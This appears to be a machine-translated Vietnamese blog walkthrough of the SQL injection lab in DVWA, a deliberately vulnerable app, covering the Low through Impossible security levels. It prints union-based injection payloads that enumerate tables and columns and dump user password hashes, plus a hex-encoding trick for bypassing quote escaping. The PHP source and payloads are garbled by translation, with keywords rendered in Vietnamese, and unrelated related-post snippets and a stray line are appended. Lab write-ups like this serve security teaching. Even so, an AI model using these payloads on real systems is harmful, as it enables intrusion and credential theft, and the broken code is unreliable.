27
4
。
SQL Insert đề cập đến việc kẻ tấn công phá hủy các câu lệnh truy vấn SQL bằng cách chèn các lệnh SQL độc hại vào. cấu trúc để đạt được mục đích thực thi các câu lệnh SQL độc hại.
THẤP
Kiểm tra mã:
' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );
Trung tâm cá nhân
Điều phát hành
từ bỏID: {$id}
Tên: {$first}
Họ: {$last}";
ID: {$id}
Tên: {$first}
Họ: {$last}";
Từ phân tích trên, chúng ta có thể biết rằng chúng ta nên sử dụng tính năng chèn ký tự trong phép tiêm.
Để ý:
Chèn ký tự SQL là khi kẻ tấn công xâm phạm các câu lệnh SQL của ứng dụng bằng cách nhập các ký tự độc hại. Ví dụ: kẻ tấn công có thể lừa ứng dụng tạo truy vấn SQL không an toàn bằng cách chèn dấu ngoặc đơn hoặc các ký tự đặc biệt khác vào trường nhập. Kẻ tấn công có thể khai thác lỗ hổng này để thực thi mã SQL độc hại, chẳng hạn như xóa, sửa đổi hoặc làm lộ dữ liệu trong cơ sở dữ liệu.
Việc chèn số tương tự như việc chèn ký tự SQL, nhưng kẻ tấn công cố gắng nhập các số độc hại thay vì ký tự. Ví dụ: kẻ tấn công có thể lừa ứng dụng tạo ra các phép tính số học không an toàn bằng cách nhập số âm. Kẻ tấn công có thể khai thác lỗ hổng này để thực thi mã độc, chẳng hạn như tấn công tràn ứng dụng, từ đó đánh cắp dữ liệu.
Khai thác:
(1) Số lượng ký tự để đánh giá.
Chúng tôi sử dụng order by để xác định số lượng trường. Khi order by báo lỗi, đó là số lượng trường.
1' hoặc 1=1 theo thứ tự 1 # 。
1' hoặc 1=1 theo thứ tự 2 # 。
1' hoặc 1=1 theo thứ tự 1 # 。
。
。
Từ trên, chúng ta biết số trường là 2. .
(2) Xác định thứ tự các trường hiển thị.
1' chọn liên hợp 1,2 # 。
。
。
(3) Lấy cơ sở dữ liệu hiện tại.
1' hợp nhất chọn 1, cơ sở dữ liệu() # 。
。
。
(4) Lấy bảng vào cơ sở dữ liệu.
1' union select 1,group_concat(table_name) từ information_schema.tables nơi table_schema=database() # 。
。
。
Nhận hai bảng lưu bút và người dùng.
(5) Lấy tên trường.
1' union select 1,group_concat(column_name) từ information_schema.columns nơi table_name='users' # 。
。
。
Lưu ý rằng có 8 trường trong bảng người dùng, đó là user_id, first_name, Last_name, người dùng, mật khẩu, hình đại diện, Last_login, failed_login.
(6) Lấy dữ liệu.
1' hoặc 1=1 hợp nhất chọn group_concat(user_id,first_name,last_name),group_concat(password) từ người dùng # 。
。
。
Việc thu thập thông tin đã kết thúc và việc khai thác lỗ hổng đã kết thúc.
Trung bình:
Kiểm tra mã:
Lỗ hổng SQL Injection Nguồn
/sqli/nguồn/trung bình.
php
php
nếu như
(
tập hợp
(
$_POST
[ 'Nộp'
] ) ) {
//
Nhận đầu vào
$ID
=
$_POST
[ 'nhận dạng'
];
//
Sử dụng hàm mysqli_real_escape_string() để thoát các ký tự đặc biệt như dấu ngoặc đơn và dấu ngoặc kép
$ID
=
mysqli_real_escape_string
(
$ TOÀN CẦU
["___mysqli_ston"],
$ID
);
công tắc
(
$_DVWA
['SQLI_DB'
]) {
trường hợp
MYSQL
:
$truy vấn
= "CHỌN tên, họ TỪ người dùng NƠI user_id =
$ID
;"
;
$kết quả
=
truy vấn mysqli
(
$ TOÀN CẦU
["___mysqli_ston"],
$truy vấn
) hoặc
cái
( '' .
lỗi mysqli
(
$ TOÀN CẦU
["___mysqli_ston"]) . ' '
);
//
Nhận kết quả
trong khi
(
$hàng
=
mysqli_fetch_assoc
(
$kết quả
) ) {
//
Hiển thị giá trị
$đầu tiên
=
$hàng
["tên_đầu_tiên"
];
$cuối cùng
=
$hàng
["họ"
];
//
Phản hồi cho người dùng cuối
tiếng vọng
"Đồng thời, chúng tôi nhận thấy rằng một biểu mẫu lựa chọn thả xuống đã được thiết lập trên trang giao diện người dùng để kiểm soát hoạt động nhập của người dùng.
。
。
Khai thác:
Mặc dù giao diện người dùng sử dụng menu lựa chọn thả xuống, chúng tôi vẫn có thể thay đổi các tham số bằng cách bắt các gói và gửi các tham số truy vấn được xây dựng độc hại.
(1) Xác định kiểu tiêm.
Ở đây, chúng tôi thực sự có thể đưa ra đánh giá trực tiếp. Chúng tôi đã tiến hành kiểm tra mã ở trên và phát hiện ra sự tồn tại của hàm mysqli_real_escape_string(). Sau đó, việc chèn ký tự chắc chắn sẽ gặp vấn đề nên chúng tôi trực tiếp thực hiện việc chèn số.
。
。
Vì giao diện người dùng sử dụng menu thả xuống nên chúng tôi phải sửa đổi các tham số bằng cách chụp các gói.
(2) Đoán số lượng trường, xác định thứ tự của các trường phản hồi, lấy cơ sở dữ liệu hiện tại và lấy các bảng trong cơ sở dữ liệu.
Bốn phần hoạt động này không khác nhiều so với Cấp độ thấp. Chỉ có các tuyên bố liên quan được đính kèm ở đây.
1
đặt hàng theo
3
#
1 liên kết chọn 1,2 #
1 hợp nhất chọn 1, cơ sở dữ liệu() #
1 union select 1,group_concat(table_name) từ information_schema.tables nơi table_schema=database() #
(3) Lấy tên trường trong bảng.
1 union select 1,group_concat(column_name) từ information_schema.columns nơi table_name='users '# 。
。
。
。
。
。
Chúng tôi đã xây dựng câu lệnh theo ý tưởng ban đầu, nhưng đã xảy ra lỗi do các dấu ngoặc đơn bị thoát nên chúng tôi đã sử dụng hệ thập lục phân để bỏ qua nó.
1 union select 1,group_concat(column_name) từ information_schema.columns nơi table_name=0x7573657273 # 。
。
。
Kèm theo đây là kịch bản.
nhập khẩu
binascii input_string
=
"
người sử dụng
"
#
Chuỗi cần chuyển đổi
#
Chuyển đổi một chuỗi sang định dạng thập lục phân bằng hàm b2a_hex() của mô-đun binascii
chuỗi_hex = binascii.b2a_hex(chuỗi_đầu_vào.mã_hóa(
'
utf-8
'
))
in
(chuỗi_hex)
#
Xuất chuỗi thập lục phân đã chuyển đổi
(4) Lấy dữ liệu.
1 hoặc 1=1 hợp nhất chọn group_concat(user_id,first_name,last_name),group_concat(password) từ người dùng # 。
。
。
Việc thu thập thông tin đã kết thúc và việc khai thác lỗ hổng đã kết thúc.
Cao:
Kiểm tra mã:
Lỗ hổng SQL Injection Nguồn
/sqli/nguồn/cao.
php
php
nếu như
(
tập hợp
(
$_PHIÊN
[ 'nhận dạng'
] ) ) {
//
Nhận đầu vào
$ID
=
$_PHIÊN
[ 'nhận dạng'
];
công tắc
(
$_DVWA
['SQLI_DB'
]) {
trường hợp
MYSQL
:
//
Kiểm tra cơ sở dữ liệu
$truy vấn
= "CHỌN tên, họ TỪ người dùng NƠI user_id = '
$ID
'GIỚI HẠN 1;"
;
$kết quả
=
truy vấn mysqli
(
$ TOÀN CẦU
["___mysqli_ston"],
$truy vấn
) hoặc
cái
( 'Có gì đó không ổn.
'
);
//
Nhận kết quả
trong khi
(
$hàng
=
mysqli_fetch_assoc
(
$kết quả
) ) {
//
Nhận giá trị
$đầu tiên
=
$hàng
["tên_đầu_tiên"
];
$cuối cùng
=
$hàng
["họ"
];
//
Phản hồi cho người dùng cuối
tiếng vọng
"ID: {
$ID
}
Tên: {
$đầu tiên
}
Họ: {
$cuối cùng
} "
; } ((
là_null
(
$___mysqli_res
=
mysqli_đóng
(
$ TOÀN CẦU
["___mysqli_ston"]))) ?
SAI
:
$___mysqli_res
);
phá vỡ
;
trường hợp
Tiếng Việt:
toàn cầu
$sqlite_db_connection
;
$truy vấn
= "CHỌN tên, họ TỪ người dùng NƠI user_id = '
$ID
'GIỚI HẠN 1;"
;
#
in $query;
thử
{
$kết quả
=
$sqlite_db_connection
->truy vấn(
$truy vấn
); }
nắm lấy
(
Ngoại lệ
$e
) {
tiếng vọng
'Đã phát hiện ngoại lệ: ' .
$e
->
lấy tin nhắn();
ra
(); }
nếu như
(
$kết quả
) {
trong khi
(
$hàng
=
$kết quả
->
lấyMảng()) {
//
Nhận giá trị
$đầu tiên
=
$hàng
["tên_đầu_tiên"
];
$cuối cùng
=
$hàng
["họ"
];
//
Phản hồi cho người dùng cuối
tiếng vọng
"ID: {
$ID
}
Tên: {
$đầu tiên
}
Họ: {
$cuối cùng
} "
; } }
khác
{
tiếng vọng
"Lỗi khi tải xuống".
$sqlite_db
->
LastErrorMsg(); }
phá vỡ
; } }
?>
Mặc dù LIMIT 1 được thêm vào nhưng chúng ta có thể nhận xét nó bằng #. Quá trình tiêm tương tự như trước và không có phần trình diễn bổ sung nào được thực hiện ở đây.
Không thể nào:
Kiểm tra mã:
Lỗ hổng SQL Injection Nguồn
/sqli/source/không thể.
php
php
nếu như
(
tập hợp
(
$_NHẬN
[ 'Nộp'
] ) ) {
//
Kiểm tra mã thông báo Anti-CSRF //isset() được sử dụng để kiểm tra xem biến đã được đặt chưa và có phải là NULL hay không.
checkToken(
$_YÊU CẦU
[ 'user_token' ],
$_PHIÊN
[ 'phiên_mã_thông_tin' ], 'index.php'
);
/*
checkToken() là một chức năng tùy chỉnh để kiểm tra xem mã thông báo bảo mật đã chuyển có hợp lệ hay không để đảm bảo rằng yêu cầu không bị giả mạo nhằm mục đích xấu. Hàm này chấp nhận ba tham số: user_token: mã thông báo bảo mật nhận được từ yêu cầu của người dùng. session_token: Mã thông báo bảo mật được lưu trữ trong phiên của người dùng. redirect: URL trang được chuyển hướng. Trước tiên, chức năng này sẽ kiểm tra xem user_token và session_token có khớp hay không. Nếu có sự không khớp, có thể là một cuộc tấn công CSRF, hàm này sẽ chấm dứt tập lệnh và in thông báo lỗi. Nếu có sự trùng khớp, hàm sẽ trả về true. Chức năng này thường được sử dụng để xử lý mọi hoạt động có thể dễ bị tấn công CSRF (chẳng hạn như gửi biểu mẫu). Đây là một kỹ thuật bảo mật phổ biến để đảm bảo rằng yêu cầu đến từ nguồn dự định và người dùng đã được ủy quyền để thực hiện hành động được yêu cầu. *?
*/
//
Nhận đầu vào
$ID
=
$_NHẬN
[ 'nhận dạng'
];
//
Một số đã được nhập vào? //is_numeric được sử dụng để kiểm tra xem giá trị là số hay chuỗi số. Hàm trả về true nếu giá trị là số hoặc chuỗi số, nếu không thì trả về false.
nếu như
(
là_số
(
$ID
)) {
$ID
=
lựa chọn
(
$ID
);
công tắc
(
$_DVWA
['SQLI_DB'
]) {
trường hợp
MYSQL
:
//
Kiểm tra cơ sở dữ liệu
$dữ liệu
=
$db
->prepare( 'CHỌN tên, họ TỪ người dùng NƠI user_id = (:id) GIỚI HẠN 1;'
);
$dữ liệu
->bindParam(':id',
$ID
, PDO::
Nội dung
$dữ liệu
->
thực hiện();
$hàng
=
$dữ liệu
->
tìm về();
//
Đảm bảo chỉ có 1 kết quả được trả về
nếu như
(
$dữ liệu
->rowCount() == 1
) {
//
Nhận giá trị
$đầu tiên
=
$hàng
[ 'tên_đầu_tiên'
];
$cuối cùng
=
$hàng
[ 'họ'
];
//
Phản hồi cho người dùng cuối
tiếng vọng
"ID: {
$ID
}
Tên: {
$đầu tiên
}
Họ: {
$cuối cùng
} "
; }
phá vỡ
;
trường hợp
Tiếng Việt:
toàn cầu
$sqlite_db_connection
;
$stmt
=
$sqlite_db_connection
->prepare('CHỌN tên, họ TỪ người dùng NƠI user_id = :id GIỚI HẠN 1;'
);
$stmt
->bindValue(':id',
$ID
,
SQLITE3_INTEGER);
$kết quả
=
$stmt
->
thực hiện();
$kết quả
->
hoàn thiện();
nếu như
(
$kết quả
!==
SAI
) {
//
Không có cách nào để lấy được số hàng trả về // Điều này kiểm tra số cột (không phải số hàng) chỉ // như một biện pháp phòng ngừa, nhưng nó sẽ không ngăn chặn được ai đó đổ // nhiều hàng và xem từng hàng một.
$num_columns
=
$kết quả
->
số lượng các cột();
nếu như
(
$num_columns
== 2
) {
$hàng
=
$kết quả
->
lấy Mảng();
//
Nhận giá trị
$đầu tiên
=
$hàng
[ 'tên_đầu_tiên'
];
$cuối cùng
=
$hàng
[ 'họ'
];
//
Phản hồi cho người dùng cuối
tiếng vọng
"ID: {
$ID
}
Tên: {
$đầu tiên
}
Họ: {
$cuối cùng
} "
; } }
phá vỡ
; } } }
//
Tạo mã thông báo Anti-CSRF
generateSessionToken();
?>
Đồng thời, mã này cũng sử dụng công nghệ PDO để vạch ra ranh giới rõ ràng giữa mã và dữ liệu, ngăn chặn hiệu quả việc tiêm SQL, đồng thời, chỉ có số kết quả truy vấn trả về mới được xuất thành công, nhờ đó ngăn chặn hiệu quả việc "cởi quần". ", Anti -Việc bổ sung cơ chế CSRFtoken giúp cải thiện hơn nữa tính bảo mật.
Ghi chú:
PDO (Đối tượng dữ liệu PHP) là một tiện ích mở rộng PHP cung cấp một cách trừu tượng để truy cập cơ sở dữ liệu mà không cần phải dựa vào một loại cơ sở dữ liệu cụ thể. PDO hỗ trợ nhiều loại cơ sở dữ liệu, bao gồm MySQL, SQLite, Oracle, PostgreSQL và SQL Server. Việc sử dụng PDO cho phép truy cập dữ liệu an toàn hơn, di động hơn và linh hoạt hơn đồng thời giảm sự phụ thuộc vào các chi tiết triển khai cụ thể của cơ sở dữ liệu.
Khi sử dụng PDO, trước tiên bạn cần xác định đối tượng kết nối PDO, đối tượng này chứa thông tin về kết nối cơ sở dữ liệu, chẳng hạn như tên máy chủ, số cổng, tên cơ sở dữ liệu, tên người dùng và mật khẩu, v.v. Sau khi kết nối được thiết lập, cơ sở dữ liệu có thể được truy cập bằng cách thực hiện các truy vấn SQL. PDO cung cấp một tập hợp các phương thức để chuẩn bị và thực hiện các truy vấn và trả về các đối tượng tập kết quả. Các biến liên kết có thể được sử dụng để ngăn chặn các cuộc tấn công SQL SQL và các giao dịch PDO có thể được sử dụng để đảm bảo tính nguyên tử và tính nhất quán của các hoạt động dữ liệu.
Tóm lại, công nghệ PDO cung cấp giải pháp truy cập cơ sở dữ liệu di động, linh hoạt và an toàn hơn, có thể giúp các nhà phát triển viết các ứng dụng PHP mạnh mẽ hơn và dễ bảo trì hơn.
Cuối cùng, bài viết về DVWA-SQLInjection (SQL SQL) kết thúc tại đây. Nếu bạn muốn biết thêm về DVWA-SQLInjection (SQL SQL), vui lòng tìm kiếm bài viết CFSDN hoặc tiếp tục duyệt các bài viết liên quan. tương lai blog của tôi! .
27
4
0
SQL Insert đề cập đến việc kẻ tấn công phá hủy các câu lệnh truy vấn SQL bằng cách chèn các lệnh SQL độc hại vào. cấu trúc để đạt được mục đích thực thi các câu lệnh SQL độc hại. THẤP: Kiểm tra mã:
CAPTCHA không an toàn (mã xác minh không an toàn) Để tải mã xác minh, bạn cần đăng ký API mã xác minh từ Google. Vì không thể truy cập Google ở Trung Quốc đại lục nên không thể lấy được mã xác minh nên bạn cần kiên nhẫn chờ đợi thời gian chờ của Google hoàn tất.
File Upload (Tải lên tệp) Thành phần của Trojan một câu thông thường: Lớp ngoài cùng là thẻ bắt đầu và kết thúc của tệp PHP. PHP sẽ phân tích cú pháp và thực thi mã bên trong. Sau đó là hàm eval. Hàm eval() chuyển đổi chuỗi thành chuỗi.
File Inclusion (File Inclusion) Lời nói đầu Bao gồm tệp cục bộ: Nhập đường dẫn tương đối và tên tệp để đưa vào tệp từ xa: Nhập địa chỉ từ xa, mã php sẽ được tự động phân tích cú pháp Tệp giả giao thức PHP://——Truy cập hệ thống tệp cục bộ http:/
SQL Tiêm (SQL echo SQL) Ý tưởng tiêm: Có bất kỳ thao tác tiêm nào không? Đó là loại ký tự hay loại số? Kiểm tra bit echo 1. Câu lệnh khóa mã nguồn thấp $query = "SELECT first_name, Last_
Tôi đã định cấu hình DVWA nhưng không thể truy cập công cụ này vì nó báo lỗi: Lỗi nghiêm trọng: Lỗi chưa được phát hiện: Gọi tới hàm không xác định mysql_connect(
Giải thích chi tiết về lỗ hổng. DOM XSS (Cross-site scripting) là lỗ hổng bảo mật web khai thác cơ chế phân tích cú pháp DOM (Document Object Model) của trình duyệt để tấn công người dùng bằng cách tiêm mã độc. DOM XSS so với
Tôi đang cố gắng thiết lập Ứng dụng web dễ bị tổn thương chết tiệt (DVWA) (www.dvwa.co.uk). Tôi đã cài đặt XAMPP theo hướng dẫn sau: http://www.apachefriends.o
Tiêm SQL (mù) (tiêm mù) 1. Phương pháp tiêm thủ công thấp Máy chủ sẽ chỉ trả về giá trị tìm kiếm mà không hiển thị nó. Kiểu tiêm SQL không có tiếng vang này được gọi là tiêm SQL mù. Câu hỏi này sẽ chỉ trả về việc người dùng có tồn tại hay không, tức là đúng hay sai. Kiểu tiêm mù này trở thành Boolean (
Tôi đang cố gắng cài đặt DVWA 1.9 trên kali linux. Mọi thứ đều chạy tốt, nhưng khi tôi cố gắng kết nối với cơ sở dữ liệu thì xảy ra lỗi thiết lập với nội dung: Hàm PHP allow_url_include: Đã tắt tôi
CSRF: Giả mạo yêu cầu chéo trang (Giả mạo yêu cầu chéo trang) Trình duyệt được sử dụng trong chương này là Firefox63. Do các trình duyệt và phiên bản khác nhau nên kết quả sao chép có thể khác nhau. 1.Thấp Đây là giao diện để thay đổi mật khẩu người dùng.
DVWA_XSS (Đã lưu trữ) XSS được lưu trữ trong một câu: Thao tác với máy khách người dùng để thực thi bất kỳ tập lệnh js nào mà tập lệnh có thể đạt được? XSS có thể được sử dụng cùng với CSRF 1. Cảnh báo chèn thấp (/x trong Tin nhắn).
Câu hỏi này đã có câu trả lời: Lỗi nghiêm trọng: Gọi tới hàm không xác định mysql_connect() [trùng lặp] (17 câu trả lời) Đã đóng 3 năm trước. khi
Tôi không thể khởi động máy chủ cục bộ trên máy ảo kali của mình bằng DVWA, apache2. Thông báo lỗi hiển thị trong DVWA là - Không thể kết nối với dịch vụ MySQL Ple.
Tôi đã làm theo một số bộ hướng dẫn, bao gồm một bài giảng được ghi trực tuyến cho thấy chỉ cần sao chép thư mục dvwa vào /opt/lampp/htdocs và truy cập localhost/dvwa trong trình duyệt có dịch vụ Xampp đã khởi động. Tôi đã cố gắng nhưng điều này
Tôi đang thiết lập DVWA trên Windows thông qua XAMPP và tôi đã tìm kiếm trên Google khoảng 24 giờ - dường như tôi không thể tìm thấy câu trả lời. Vấn đề của tôi là thiết lập máy chủ: Hàm PHP `allow_ur
Tôi đang thử nghiệm DVWA cho SQLi. (Thấp) Cho đến nay tôi có thể thấy tên người dùng và mật khẩu nằm trong bảng "Người dùng" của cơ sở dữ liệu "dvwa". Bây giờ tôi đang tự hỏi tại sao tôi không thể sửa đổi/thay đổi/cập nhật mật khẩu của một người dùng cụ thể bằng cách sử dụng: ;
Tôi đang cố gắng sử dụng jsoup để gửi yêu cầu có cookie được chèn thủ công nhằm phát hiện các lỗ hổng chèn SQL. Vấn đề có vẻ là chỉ có một cookie hợp lệ và tôi không hiểu tại sao. Trước tiên tôi tự xác thực bản thân và nhờ đầu bếp
Tôi là một lập trình viên xuất sắc, rất giỏi!